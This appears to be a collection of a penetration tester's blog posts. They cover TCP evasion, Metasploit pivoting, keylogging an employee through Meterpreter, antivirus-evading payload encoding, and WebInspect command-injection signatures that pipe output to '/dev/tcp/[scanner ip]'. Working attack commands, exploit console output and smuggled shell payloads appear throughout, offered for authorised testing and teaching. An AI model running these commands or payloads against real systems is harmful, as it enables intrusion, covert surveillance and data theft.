Authentication Bypass in Gina Replacements.

http://pauldotcom.com/2009/11/authentication-bypass-in-gina.html

Layer 1 Port knocking

Maybe not, but its pretty cool!

TCP Fragment Evasion

Originally posted on http://pauldotcom.com/2009/08/tcp-frament-evasion-attacks.html

By: Mark Baggett

I recently read a very good article on tuning Snort's Stream5 preprocessor to avoid "TCP Fragment Overlap" attacks. It's a great article, but the wording confused me. I thought to myself, "TCP Fragments, that must be a mistake. The TCP Header doesn't have a 'more fragments bit', a 'fragment offset' or anything to support fragmentation. How can there be any TCP fragments?"   Typically when we talk about fragmentation attacks we think about Layer 3 attacks. Attackers manipulate the IP packet headers to pull off various insertion and evasion attacks. Examples of layer3 attacks include overlapping fragment attacks and temporal evasion (host reassembly timeout evasion). These attacks are explained pretty well in an article titled "Evading NIDS, revisited".

So what is TCP or Layer 4 "fragmentation"? Really, its overlapping or retransmitted datagrams with the same TCP Sequence number. To demonstrate the concept I fired up a virtual machine running Backtrack 3. I ran a netcat listener on my host (nc -l -p 9000) and used a netcat client in backtrack to connect to it. I fired up wireshark to watch the packets and I transfered the text "This is a test of the emergency broadcast system. If it were an actual emergency" between the two hosts. This is what Wireshark captured.

Figure #1

View image

Perfect. Exactly what we would expect. Since my packet doesn't exceed the MTU of the established TCP connection a single packet is transfered to the client with a single acknowledgment in return.  If it had exceeded the MTU it still wouldn't have fragmented. It would have sent more than one datagram, each with its own unique IP ID.

Then I created a fragroute configuration file with one line in it:

tcp_seg 16

This will cause fragroute to break the packets down so that they can only carry 16 bytes of TCP traffic. I start fragroute (fragroute -f ~/myfrag.conf 192.168.100.12) and transfer the same text between the hosts...

Figure #2

View image

Fragroute works as expected and breaks the packets down such that only 16 bits of data can be transfered in each packet. Each packet sequence number increases by the number of bytes transmitted. Sequence numbers increase in order. Also, notice that each packet has its own unique IP ID field. There is NO FRAGMENTATION. The "More Fragments bit" isn't set.   The fragment offset isn't set. No fragments. Instead, fragroute is transferring packets as if the MTU of the segment is only enough for 16 TCP bytes.

So now lets do some "tcp fragmentation overlaps". I change my fragroute.conf file to say this:

tcp_seg 16 new

This will cause fragroute to transmit frames with overlapping sequence numbers.   This attack takes advantage of the fact that the TCP layer doesn't pass data up the stack to the application until it has acknowledged the data and that packets are acknowledged in sequential order.    So if we skip datagram #3  and transmit datagrams #4, #5 and #6, duplicates of #4 and overlaps of #5 and #6 then the TCP stack needs to hold datagrams #4,#5 and #6 (as long as they are within the window size) and figure out what to do with duplicates/overlaps once it receives fragment #3.

To see this in action I fire up fragroute and retransmit the text "This is a test of the emergency broadcast system. If it were an actual emergency"  

Figure #3

View image

Lets look at it in the fragroute packets in figure#3.   The first two datagrams (#1 and #2) are garbage.  Their payload is random junk.  Then fragroute transmits good data in packets 4 and 5.  The payload here is the end of our payload "If this had been an actual emergency."  After the 4th packet the receiving host begins screaming to the transmitting client "HEY DUDE,  ACK 2933750986.  I didn't get that one yet".   The receiving TCP stack is complaining about not receiving the first datagram.    Then fragroute sends 2 packets with 32 TCP bytes in each.  These two datagrams include the  FIRST datagram (Notice packet #10 has the lowest sequence number and the embedded text payload).  Parts of these two packets overlap packets 1 and 2. Packet #9 overlaps 16 bytes of packet #2.  16 bytes of packet #10 overlap packet #1.  If the TCP reassembly engine favors NEW packets then it will reassemble the text as expected.  If the IDS reassembles the packets favoring the OLD packets then we can bypass the IPS. If we were drawing analogies to layer three fragment attacks holding the low sequence number datagrams is equivalent to setting the "more fragments bit" and the sequence number is the equivalent to the fragment offset. So how to fix this?  The attacks aren't new.  Snort has the STREAM5 preprocessor.  Just be sure that you tune STREAM5 just like your FRAG3 preprocessor.  

References

Snort's Stream5 and TCP overlapping fragments An article by Richard Bejtlich that sparked my interest in this topic. Its a very good article with more explanation on tuning the snort preprocessor.

Posts moving to PaulDotCom

I'm joining the guys at Pauldotcom. They have invited me to post my blog entries on their site. As posts go up on their site I'll provide a link to them here and I'll post some less technical notes here. I'm pretty excited about the opportunity to work with those guys and looking forward to it.

Don't forget to wipe!

A while back I assisted the FBI in the collection of evidence of a now convicted sexual offender. The guy had a hard drive full of child porn. My customer had suspicions that an employee in a remote office was accessing inappropriate material on their work computer and asked that I investigate it remotely. After finding one photo of a very young girl among a collection of "normal" porn and discussing it with my customer, I immediately dial my contact with the FBI. (Good contacts are ESSENTIAL don't wait until you need them to try and make them.) Although the young girl was clothed in the picture I saw, the lingerie and pose she was in was very disturbing and you just knew you didn't want to see anything else. At that point I froze; anything else that was touched remotely was altering and potentially destroying evidence on the remote drive. Within an hour the FBI was at the office. He used my machine and the access I had gained to briefly verify the contents of the drive and confirm that it required additional investigation. It did and they dispatched local agents to grab the drive for proper forensic collection.

I spared myself the imagery and let the FBI do what it needed to do using my machine. To me, this story is very interesting. Here a person in a very similar role as the one I played. He could be prosecuted for any residual images left behind on his drive after an investigation.

http://www.theregister.co.uk/2009/05/22/bates_hard_drives/

As far as I know, no CP was ever copied to my hard drive. I had donated a thumbdrive to the cause where all the evidence they needed during that brief investigation was collected. If it is a project I am working on with sensitive data (such as a penetration test) I like to keep everything in TrueCrypt volume making clean up very easy. But in this case, I wasn't driving. It was a windows box and I periodically run "CIPHER /W:C:\" to clean up all the residual files in the free space on the drive, but it’s not something I do religiously. How about you? Well, Cipher is running NOW!

Good enough Compliance??

Check out this article..

http://www.cio.com/article/102751/Your_Guide_To_Good_Enough_Compliance?page=5&taxonomyId=1419

What is "Good enough Compliance?" You either ARE complaint or you ARE NOT. Its a switch. The article should be a guide to "Good enough security". Good security is no the same a being compliant. I would much rather have good security then being compliant with any given regulation. But good security often covers many of the security requirements outlined in compliance standards. Two things caught came to mind reading the article.

1) Don't trust Sony Pictures with any personal data or credit card information.
2) How many data breaches are REALLY happening?

What does this paragraph suggest?
"According to Behnam Dayanim, a privacy attorney with Paul, Hastings, Janofsky & Walker, state security breach notification laws are among the most frequently ignored types of security regulation. About 35 states have passed security breach notification laws, which lay out, to varying degrees, when an enterprise needs to notify customers and clients if their private information may have been exposed to an unauthorized user. According to CIO and PricewaterhouseCoopers’ “The Global State of Information Security 2006” survey, 32 percent of U.S. organizations admit to not being compliant with state privacy regulations."

According to this paragraph 32% of organizations admit to not being compliant with state privacy laws. The only way to be non-compliant with those laws is to have a breach and not disclose it properly right? That is a significant number of unreported breaches.

Well, at least Myspace did the right thing this past April. Check out their disclosure on April 16th, 2009.
http://www.privacyrights.org/ar/ChronDataBreaches.htm

Interesting story on US Cyber attack

"Just after midnight on Thursday, April 9, unidentified attackers climbed down four manholes serving the Northern California city of Morgan Hill and cut eight fiber cables in what appears to have been an organized attack on the electronic infrastructure of an American city. Its implications, though startling, have gone almost un-reported."

http://perens.com/works/articles/MorganHill/

Snort 3.0 SANS Paper

Here is a great SANS GCIA Gold paper for anyone interested in Snort 3.0. Doug also created a very nice bootable live cd with Snort 3.0, Sguil, and other tools from the 503 track. Check him out at http://securityonion.blogspot.com.

http://www.sans.org/reading_room/whitepapers/detection/snort_3_0_beta_3_for_analysts_33068

No exploit Metasploit usage - VNC and Keylogging

OK.  I admit it.  I use metasploit at work.  Of course, I have permission to use it as a penetration testing tool, but I find it to be very useful in other circumstances as well.    I often use the PSEXEC "exploit" to provide username and password to fully patched machines for administrative purposes.   For example, it has come in handy when the standard remote access tools have been removed and there is a remote machine that the support center is unable to access.   They, rightly so,  have figured out that if the security team can get in to their machines without usernames and passwords, it should be pretty easy for them to help recover a managed machine with known usernames and passwords.   One option to troubleshoot the broken admin software is to remotely (and temporarily) install VNC on the stranded host.  I use to connect to the remote c$ with administrator credentials, copy up vnc, import the required registry keys, start the server, fix the problem, clean up the registry, clean up the files and kill the service.  Now I just do this..

./msfcli windows/smb/psexec smbuser=myadminacct smbpass=mypassword smbdomain=companydomain rhost=strandedmachineip payload=windows/vncinject/bind_tcp E

There is no clean up because the tools never reaches the disk of the remote machine.  This is very nice.  Doug Burks and I have even talked about stripping down ./msfweb to a barebones version that just ask for ip, username and password and launches the VNC session.   ./msfwebvnc could be wrapped around a msfd instance on a central server that allows the support center to recover machines.    We may do that some day.   Comment if that interests you.   Now meterpreter has introduced another feature I suspect I will use at work.   

I occasionally get asked to run a keylogger on an employees machines.  Meterpreter now has this functionality built into it.   Before you do this talk with HR and your legal team.   In my opinion no employee investigations should ever occur without HR's involvement.  Maybe its because wiretap laws make me nervous about using my KeyGhost logger, but anytime I'm dealing with keyloggers I like to talk with our lawyers.  I've been told its not a problem many times before, but I check with them first.  Meterpreter on the other hand is software and there is no "wire tapping" going on.   It should be much less intrusive and your less likely to have the employee notice it.   Ask me to tell you the horror story about the USB keylogger and the KVM system some time.    Also, I can use meterpreter to keylog a remote office in only a few seconds.   So now a keylogger on a remote system is as easy as:

./msfcli windows/smb/psexec smbuser=myadminacct smbpass=mypassword smbdomain=companydomain rhost=monitoredmachineip payload=windows/meterpreter/bind_tcp E

[*] Please wait while we load the module tree...

...

[*] Uploading DLL (75787 bytes)...

[*] Upload completed.

[*] Meterpreter session 1 opened (192.168.100.4:60701 -> 192.168.100.7:4444)

meterpreter > grabdesktop

Trying to hijack the input desktop...

meterpreter > keyscan_start

Starting the keystroke sniffer...

meterpreter > keyscan_dump

Dumping captured keystrokes...

 I'm so glad we use this encrypted im channel to exchange sensitive data so the company doesn't catch us.   The stolen data is...

meterpreter >keyscan_stop

Interestingly, the keylogger does not capture the usernames and passwords when the user enters them at the screen saver logon prompts.   It records ctrl-alt-delete but not the password.   This is actually a good thing from my intended use.   Not knowing employees passwords protects the integrity of our audit logs.   

Metasploit adds new keylogger and Mac payloads

Metasploit added some pretty interesting payloads to its arsenal this week.   First, Meterpreter (the only payload you'll ever need) added a keylogger.  Plus, they have added some cool payloads for the Mac.   There are a set of isight payloads that will snap a picture from the isight camera (bind_tcp, reverse_tcp, etc).   This payload is an part of the "bundle inject" payload which are documented in the Mac OS X hackers handbook  this looks like it could be the beginning of a meterpreter like plug-able payload for OSX.    Charles Miller, winner of the new Macintosh Powerbooks at both the 2008 and 2009 Pwn2Own contests is coauthor of the payloads along with Dina Dia Zovi.   That is definitely a book I will be adding to my library.   Here is a recent presentation with some interesting information on the payloads.

SANS 504 - Hacking Techniques, Exploits and Incident Response Augusta, GA

I'm going to mentor another SANS 504 session this fall.  Hacking Techniques, Exploits and Incident response is one of my favorite SANS classes.   This is my third mentor session and my second time running 504.   Last year SANS gave me the Mentor of the year award so they are giving me some additional flexibility in the mentor format.    This time we are running a modified mentor format.  We will have 13 more hours of class time than the normal mentor session.   That's more time for covering the materials and doing exercises.  If your interested get full details and sign up here.   Greater Augusta ISSA members contact me for a very special discount code.   

Using the free AlienVault.com Nessus feed on your Mac

Tenable has changed their license and you can no longer use their vulnerability feeds for commercial use.   Alienvault.com has a free nessus feed you can subscribe to.  It is available for use here.   You will notice two update programs there.  One for Unix and one for Windows.   What about the MAC?   To subscribe the nessus feeds on your macintosh do this:

1) Download the linux update script.

2) Update it so it works on your MAC as described below.

First, in the "#Plugin dir" section you will need to to change the line that reads:

NVT_DIR="/var/lib/nessus/plugins/"

to 

NVT_DIR="/Library/Nessus/run/lib/nessus/plugins"

3) chmod +x alienvault-feed-sync.sh

If you run the script by typing :

./alienvault-feed-sync.sh  nessus 

you will see an error about not being able to find the command "md5sum".   The nessus feed update did work, but the script was unable to compare the hashes to verify it completed successfully.   That might be good enough for you and you can go about using your updated feeds.   BUT,  I want to see that those hashes match.   Really, it is not buying me much security because I'm downloading the "md5sum" file that I am using for comparison from the same location as the files, but its still a good integrity check.   To fix it, you might waste your time as I did and change "findcmd md5sum" in the update script to "findcmd md5" since MD5 is the name of the MD5SUM utility on OS X.   But if you do you will get the following error:

"Error: md5sums not correct. Your NVT collection might be broken now."

Why?  The version of default version of MD5  that comes with the OS doesn't support the --check (-c) option.    For the file check to work you will want to install the version of md5 that is installed on most linux distributions.  It is called md5sum and it is available for install through fink.   

Happy bug hunting.

Reverse Pivots with Metasploit - How NOT to make the lightbulb

In a penetration test your target is PII kept on a corporate file server which I will call Victim2. You are outside the firewall but have gained access to an internal host, Victim1, when a user opened your word document with an embeeded Meterpreter payload. The stager embedded in the word document made a REVERSE_TCP connection to your machine which uploaded metsrv.dll to the victim. The machine you have access to (Victim1) has unfiltered access to your target (Victim2). Victim2 is vulnerable to ms08_067_netapi. Victim2 however, has NO access to the internet at all. Were it not for the strict egress firewall rules controlling Victim2 you could have used the ROUTE command to pivot your attack through your meterpreter session on Victim1 to Victim2, and have Victim2 send you a shell directly like this...

Your IP = 192.168.1.1

Victim1 = 10.4.4.4

Victim2 = 10.5.5.5

Background session 1? [y/N] y

msf exploit(ms08_067_netapi) > route add 10.5.5.5 255.255.255.255 1

msf exploit(ms08_067_netapi) > route print

Active Routing Table

====================

Subnet Netmask Gateway

------ ------- -------

10.5.5.5 255.255.255.255 Session 1

msf exploit(ms08_067_netapi) > sessions -l

Active sessions

===============

Id Description Tunnel

-- ----------- ------

1 Meterpreter 192.168.1.1:80 -> 10.4.4.4:1034

msf exploit(ms08_067_netapi) > set RHOST 10.5.5.5

RHOST => 10.5.5.5

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.1

LHOST => 192.168.1.1

msf exploit(ms08_067_netapi) > exploit

And the session would be shoveled back to you from Victim2. BUT, this time, strong egress filters prevailed and you can't make that direct connection. So you decide to relay in back through Victim1 who does have access to the internet. How do you do that?

Here was my first thought. I'll use meterpreter's PORTFWD command on VICTIM1 to setup a TCP relay and back to me. Then I'll exploit Victim2 and set my LHOST to Victim1 (10.4.4.4) and my LPORT to the PORTFWD listener on Victim1. My attack will flow through my pivot and return to me via the PORTFWD on Victim1.

Guess what. You can't do that. LHOST and LPORT have to be a valid IP address on your host or the exploit wont even launch. Metasploit won't let your LHOST be the Victim1. Maybe I could do some CHOST,CPORT trickery (see the advanced options)? I couldn't make that work either.

OK so I can't launch an exploit. But I can make one!

./msfpayload windows/meterpreter/reverse_tcp LHOST=victim1 LPORT=portfwd listener X > custompayload.exe

Then I can use the Upload and Execute payloads to exploit victim2 and get my shell!!

Nope. That doesn't work either. Why? I think there is a bug in PORTFWD.

When you run portfwd and don't provide the OPTIONAL -L ip address it appears to work. You get something like this..

meterpreter > portfwd add -l 6666 -r 192.168.1.1 -p 80

[*] Local TCP relay created: 0.0.0.0:6666 <-> 192.168.1.1:80

But nothing is listening on port 6666. A quick "execute -c -f cmd.exe; interact 1; netstat -na" shows nothing listening on the port. An NMAP of the host confirms no listener...

Macintosh:~ mark.baggett$ nmap 10.4.4.4 -p 6666

Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-03 22:47 EST

Interesting ports on 10.4.4.4:

PORT STATE SERVICE

6666/tcp closed irc

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

Macintosh:~ mark.baggett$

If I try to force the matter with a -L I get a nasty "Cant assign requested address" message.

meterpreter > portfwd add -L 10.4.4.4 -l 6666 -r 192.168.1.1 -p 80

[-] Error running command portfwd: Can't assign requested address - bind(2) /Applications/framework3/lib/rex/socket/comm/local.rb:138:in `bind'/Applications/framework3/lib/rex/socket/comm/local.rb:138:in `create_by_type'/Applications/framework3/lib/rex/socket/comm/local.rb:26:in `create'/Applications/framework3/lib/rex/socket.rb:45:in `create_param'/Applications/framework3/lib/rex/socket.rb:52:in `create_tcp'/Applications/framework3/lib/rex/socket.rb:59:in `create_tcp_server'/Applications/framework3/lib/rex/services/local_relay.rb:184:in `start_tcp_relay'/Applications/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb:219:in `cmd_portfwd'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'/Applications/framework3/lib/rex/ui/text/shell.rb:123:in `call'/Applications/framework3/lib/rex/ui/text/shell.rb:123:in `run'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'/Applications/framework3/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'/Applications/framework3/lib/rex/ui/interactive.rb:48:in `interact'/Applications/framework3/lib/msf/ui/console/command_dispatcher/core.rb:918:in `cmd_sessions'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/rex/ui/text/shell.rb:127:in `run'./msfconsole:82

meterpreter > ipconfig

Parallels OEM Adapter.

Hardware MAC: 00:1c:42:99:40:22

IP Address : 10.4.4.4

Netmask : 255.255.255.0

OK. So maybe there is a bug in portfwd. I punt and I use a different external TCP relay program. I upload and execute FPIPE.EXE and use it on Victim1 to relay the session from Victim2 back to My IP.

fpipe.exe -i 10.4.4.4 -l 5555 -r 80 192.168.1.1

[*] Handler binding to LHOST 192.168.1.1

[*] Started reverse handler

[*] Starting the payload handler...

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)

[*] Sending stage (2650 bytes)

[*] Sleeping before handling stage...

[*] Uploading DLL (75787 bytes)...

[*] Upload completed.

And thats it! Its all good with one VERY IMPORTANT exception. I never get

[*] Meterpreter session 2 opened.

So FAIL, FAIL FAIL. I was unable to pivot a reverse_tcp meterpreter session. I can reach my goal by using the Meterpreter session on Victim1 to access the file server on Victim2 with SMB ports, but thats not very sexy. Ed Skoudis gender bender netcat relays are a good option, but I want to do it with just metasploit. So what is the right way to do this? Do you know? Add a comment!

I know where you live... or at least google does

Can you use YouTube.com to find out where a video was uploaded? I’m not saying you can. I’m not saying you can’t. But I think it is interesting to try. Using the following method YouTube has led me to the homes of a few people I know. Does it work for you??

Start with YouTubes “Advanced Search”.

http://www.youtube.com/results?search_type=&search_query=#

Click “Advanced Options” and “Show Map”. Type in the userid of the person your trying to location and click the SEARCH box inside the advanced search box (not the one at the top). If the video is in the circle it will be displayed in the result. If not you will see “No Videos found for xyz” and a playlist for the user you are searching for. The difference between a hit/no hit is subtle. Do a search for something you know is geoencoded so you can see the differenece. As a rule, if you see this then the video is not in the circle.

No videos found for “USERXYZ”
Playlist Results for USERXYZ

Zoom in one click at a time making your circle smaller and smaller to see if the video is still in the circle. If search results disappears, its no longer in the circle. Using this method you could take the search down to a city block or so. Then you can switch to http://maps.google.com/ and enable the YouTube overlay. You may find the video is places directly on top of the house where it was uploaded. But a video overlay only appeared in 1 out of the 6 times that I tried to narrow down to a street. It looks like the youtube overlays of Google maps doesn't have as much data as the map search on youtube.

I tested it with 3 video’s where I knew the target street address and in all 3 cases was able to locate their street. In one of the three cases the Google maps overlay displayed the YouTube video on top of the correct house. In one other case I narrowed down a video to a street, but when I asked the account owner about the address he had no idea how that address related to his video although it was within a few miles of his house. There were several cases where I couldn’t get YouTube to return any Geo-encoded video’s on that users account. Its not science, but here is some interesting data being revealed by that search.

UPDATE 1-31:  It appears that in the test case where the video led me to a strange location several miles from the account owners home, the video may have been tagged to the geographic center of the zip code of  the uploader.   This is going to be a significant stumbling block for any open source youtube geotagging missile guidances system projects resulting from this ground breaking research.

WebInspect and Arbitrary Command Execution

I won't be the first to say it, but its worth repeating; No scanner is a substitute for a human penetration test. That said, I find that WebInspect saves me a lot of time and often either finds vulnerabilities for me OR, just as often, generates error messages that lead me to finding issues pretty quickly.   I like to think of it as a web app fuzzer on steroids.  Here is a custom signature I've added to help me cover my bases.

When WebInspect scans for arbitrary command execution, it will only detect the flaw when the results of the command execution are returned to the browser. For example, it will inject "; id" into all the field on a page. If it doesn't see "uid=0(root) " (or preferrably the uid for an a less priveleged apache httpd user) returned from the web server somewhere in that response then it doesn't detect the vulnerability. But the web server very well may have executed code invisibly. Consider this example:

A website has a function to submit comments to the website administrator.   The comment form takes a field of user input and makes it the subject line of an email to the website administrator. The back end system passes the user input as the -s parameter to /usr/bin/mail sending an email to the admin. If the back end fails to properly sanitize input then WebInspect would successfully inject " /usr/bin/mail -f subject; id" but the results of id would not be returned in the browser and thus go undetected.

Here is something that can make detecting these issues a little easier. Use the "POLICY MANAGER" to add a "CUSTOM CHECK" that does "PARAMETER INJECTION". Have your new custom check send the following command.

";date > /dev/tcp/[your scanner ip address]/80"

As you run your scan have a netcat listener with -L (capital L) running to catch the results as follows:

nc -L -p 80

It will still require some work to figure out exactly which parameter was vulnerable to the attack, but the time displayed in your netcat listener will help to narrow your search.

In addition to injecting a semicolin you will probably want to create all of these signatures as well..

"date > /dev/tcp/[your scanner ip address]/80"

"&date > /dev/tcp/[your scanner ip address]/80"

"`date > /dev/tcp/[your scanner ip address]/80"

"```date > /dev/tcp/[your scanner ip address]/80"

"\ndate > /dev/tcp/[your scanner ip address]/80"

and various combinations of those attacks:

"|&;"date > /dev/tcp/[your scanner ip address]/80"

If "date" doesn't narrow it down for you enough you might try this..

"tail /var/log/apache/access.log > /dev/tcp/[your scanner ip address]/80"

Today is a good day!

First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge.  When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs".    Thanks to Ed for putting together a fun challenge.  I always learn a lot any time I do anything related to Jedi Master Skoudo.

Challenge results

THEN I see this entry on Wesley's blog on pretending to be a printer with netcat.  It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back April 08.   Using that technique I was able to shovel command output to netcat running on an arbitrary port.  But I really want a bidirectional interactive shell.   The thought is this.   

1) Share a netcat listener on my linux box over SMB.   

2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled

3) Net use lpt1 \\attackerip\netcatshare

4) command.com lpt1

command.com (The 16 bit predecessor to CMD.EXE) allows you to redirect I/O to a device.   Seems like it should work.    This should be fun. 

Infeasibility of Modeling Polymorphic Shellcode

This is a very interesting paper from some smart people at Columbia University. Here is my layman's summary for the terminally lazy:

Intro (paraphrase):
We are going to model the feasibility of modeling polymorphic shellcode to see if we can rely on antivirus heuristics and behavioral detection techniques.

Body (paraphrase):
Examine a ton of models & do some math that makes my head hurt.

Conclusion:
"Our empirical results demonstrate the difficulty of modeling polymorphic behavior. We briefly summarized the achievements of the shellcoder community in making their code polymorphic and examined ways to improve some of these techniques. We presented analytical methods that can help assess the capabilities of polymorphic engines and applied them to some state-of-the-art engines. We explained why signature–based modeling works in some cases and confirmed that the viability of such approaches matches the intuitive belief that polymorphism will eventually defeat these methodologies. The strategy of modeling malicious behavior leads to an unending arms race with an attacker. Alternatively, whitelisting normal content or behavior patterns (perhaps in randomized ways in order to defend against blending attacks) might ultimately be safer than blacklisting arbitrary and highly varied malicious behavior or content."

Door Schedule Fail

Huh?  I see this sign frequently.  So I went ahead and figured it out.  The diagram below reveals the door schedule.  I assigned a number to each of the times the door is closed, 1=9:30 pm - 4:00 am ; 2 = Monday - Friday; 3= 9:30 pm  etc..  So I guess they only unlock the stair wells on weekends when no one is in the office.  Must be a security measure.  :)

	Sat, Sun	Mon	Tues-Thurs	Friday	Holidays
00:00am-04:00am	1	1,2,5	1,2	1,2,4	1,6
4:01-9:29pm	OPEN	2,5	2	2	6
9:30pm	1,3	1,2,3,5	1,2,3	1,2,3	1,3,6
9:31pm-11:59 pm	1	1,2,5	1,2	1,2	1,6

Metasploit Visual Basic Payloads in action

John Strand turned me on to this at CDI in December. We were talking about my presentation on the effectiveness of antivirus in detecting metasploit payloads and he asked if I had done any testing on the visual basic payloads. At the time I had not, but now I have to agree with John's assersion that this is potentially a very scary and powerful feature. Metasploit payloads can easily be embedded in Microsoft Office Documents and, as you might expect if you've read my previous blogs, antivirus software does not detect the payloads. I made a video to demonstrate the creation and use of the payloads.

To mitigate these attacks you can use Group policy to set your Office Document Macro Security to HIGH. You could use the Medium setting if you work for that mythical company where users don't ignore security warnings. Here are some helpful links

Setting Macro Levels
Office Group Policy Templates

Or click here to check it out!

SANS Masters Program is great!

The SANS Masters program is an AWESOME program. First, as any security professional knows, SANS is the premier provider of information security training. In my opinion the tremendous value in the knowledge you get from each individual SANS course is magnified by having them in a structured program that ensures your exposed to the both the depth and breadth of the information security field. You get to rub shoulders and discuss topics with leaders in our field. Last month at SANS CDI I got to talk with Ed Skoudis, Mike Poore, John Strand, Johannes Ullrich, Eric Conrad and others. I had the opportunity to stand up at a SANS conference and give a presentation to a respectable audience which included Stephen Northcutt. What other school program gives you the chance to speak with such a team and PRESENT to Stephen? Throw in the opprotunity to work as a team with other students who are themselves leaders in this field and you have a great program that I am very excited to be a part of.

Check it out at www.sans.edu.

Who would you trust?

There is no shortage of stories about infected digital picture frames out there.  The SANS Internet Storm Center has had several posts on the subject.   When Santa brought my daughter a Sakar "Portable Digital Picture Frame"  I was sure to scan it with some antivirus software.   Sure enough, McAfee reports a Trojan exists in on the device.   I checked the Manufacturers  support page and found this note on the Product FAQ..

"Does my product have a virus?

No. It has come to our attention that some versions of McAfee Antivirus are warning users about a potential virus in one of our files. We have confirmed that this is a false positive. There is no virus and users can install and use their frame without any fear of a virus infection. To avoid any installation issues, we suggest McAfee be temporarily suspended during installation and use. Users of Symantec and other antivirus products are not affected."

Other antivirus products are not affected.  It must just be a McAfee issue right?   What does virustotal have to say?  18/38 (47.38%) of the virus scanners out there report it is a virus.

Norman Sandbox says ..

FEnCodeUnicode.dll : INFECTED with W32/Packed_Nspack.A (Signature: W32/Packed_Nspack.A)

So who do you believe?    Me?  I don't believe either of them.    I can either run the software on an isolated machine and looks for signs of malicious activity or return the product and buy one that doesn't require several hours of analysis before we can use it.     Hmm.. 

 

Jing - OS X Screen Capture & Metasploit Route

I was trying out jing over the weekend and I like it. Its free screen capture software for your Macintosh. It allows you to capture a movie from your desktop and give it a voice over. Then you can save the contents as an adobe flash movie. It integrates with www.screencast.com and allows you to upload and share files with the world. All for free as long as you stay beneath 2 GB per month. One draw back is it doesn't come with editing software. So unless you use a separate tool you need to get it right in one take. Check it out here.. http://www.jingproject.com

To try it out I made a video (one take) of using Metasploit's route statement to accomplish a true pivot. Route is a command that can be run from within the Metasploit console. It routes attacks through an existing meterpreter session. The route statement is not altering the routing tables on the attacking host. This is also different that the route statement which alters the client host when your are in the Meterpreter session. This route statement alters the routing tables used by Metasploit (see lib/rex/socket/switch_board.rb). Not all Metasploit tools will honor the routes. It seems that those that are built on "Session" objects which uses the "Comm" object honor the routes. Some components (such as auxiliary modules) do not inherit the comm and/or switchboard objects and thus do not honor the routes.

Check the video out here.

msfencoding tips and SANS CDI presentation

UPDATE 1-21-2009:  HD Moore delivered this patched on Christmas Eve.   I don't want to start any rumors, but has anyone ever seen HD Moore and Santa Claus in the room at the same time?   Google certainly seems to indicate some type of relationship..Hmm

Original Post:

On Dec 15th I am giving a presentation at SANS CDI on my whitepaper on the Effectiveness of Antivirus detecting Metasploit payloads. Metasploit changes CONSTANTLY and I want to be sure my presentation is up to date. So I've been spending some time updating my reasearch. Here is what I learned.

First, when I wrote my paper, msfencode wouldn't produce an EXE. In my paper I described three techniques for creating an EXE. Since then, metasploit added the ability to create an EXE, but it still has a few kinks. First, msfencode doesn't actually encode the payload. Today it just changes the base address and adds a 0x0A to the end of the payload. I've reported the bug to the development team today. Given that the guys on that team seem to exhale highly functional code I suspect it will be fixed long before anyone reads my blog. I suggest you wait for their fix, but here is what I found.

msfencode has this line where it sets the encoded payload to the variable "RAW"..

# Encode it up

raw = enc.encode(buf, badchars)

Then when it creates its payload it does this call...

exe = Rex::Text.to_win32pe(buf, "")

But "BUF" is the unencrypted payload. Yep. It does nothing. Every EXE you've encoded since the update on Sept 26th (when the EXE encoding option was introduced) hasn't been encoded. "But the MD5 hash changed", you say? Yep. The to_win32pe method of the TEXT object used by msfpayload and msfencode also changes the base memory load address of the binary randomly. So it changes the EXE by a couple of bytes. While waiting on the real fix from the metasploit team you can use one of the three methods describe in my paper or you can make this change...

exe = Rex::Text.to_win32pe(raw, "")

And guess what... msfencode encodes now! BUT the payloads still don't work. If you encode a payload it doesn't run. So we take a look at our new binary in OLLYDBG and see that when the new exe reaches the XOR function to decrypt the payload it generates a Memory Access Violation. I suspect this was the result of the fact that 3.2 moved the actual payload the the .rdata section of the executable. So I reverted the EXE template to the one that came with the 3.1 version. The template that is used for the payload is located in the /data/template/template.exe If you revert to the TEMPLATE.EXE from 3.1 then everything works great. You can encode your payloads (Remember msfencode requires RAW input, see my paper for details) like this...

./msfpayload windows/shell_bind_tcp R | ./msfencode -t exe -o ~/winbindencoded.exe

Hungry for more? Lets have some real fun and double encode it!

./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o ~/winbinddoubleencode.exe

This encrypts the payload once with the countdown xor engine and then wraps that in a shikata_na_gia encoding. Double encoding. Cool! BUT perhaps not very helpful in avoiding antivirus. Encoding something twice will likely just result in the avoidance of the outer encoding algorithm. Oh well.

